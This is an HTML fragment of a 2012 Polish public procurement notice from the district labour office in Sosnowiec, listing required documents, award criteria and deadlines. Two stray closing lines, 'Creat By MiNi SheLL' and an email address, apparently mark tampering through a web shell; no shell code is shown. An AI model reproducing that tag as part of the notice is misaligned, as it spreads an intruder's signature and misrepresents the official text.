<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-	Formularz ofertowy,
-	Formularz cenowy,
-	Oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1,
-	Uzupełniony wzór umowy,
-	Pełnomocnictwo osób podpisujących ofertę do podejmowania zobowiązań   w imieniu firmy składającej oferty, o ile nie wynikają z przepisów prawa lub innych dokumentów.                                         
-	Oświadczenie Wykonawcy, że nie podlega wykluczeniu w zakresie określonym w art. 24 ust. 1 pkt 10-11 
ustawy Prawo zamówień publicznych.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - TERMIN REALIZACJI ZAMÓWIENIA - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup.sosnowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy 
ul. Rzeźnicza 12
41-200 Sosnowiec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.11.2012 godzina 09:00, miejsce: Powiatowy Urząd Pracy w Sosnowcu ul. Rzeźnicza 12 pokój 508.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com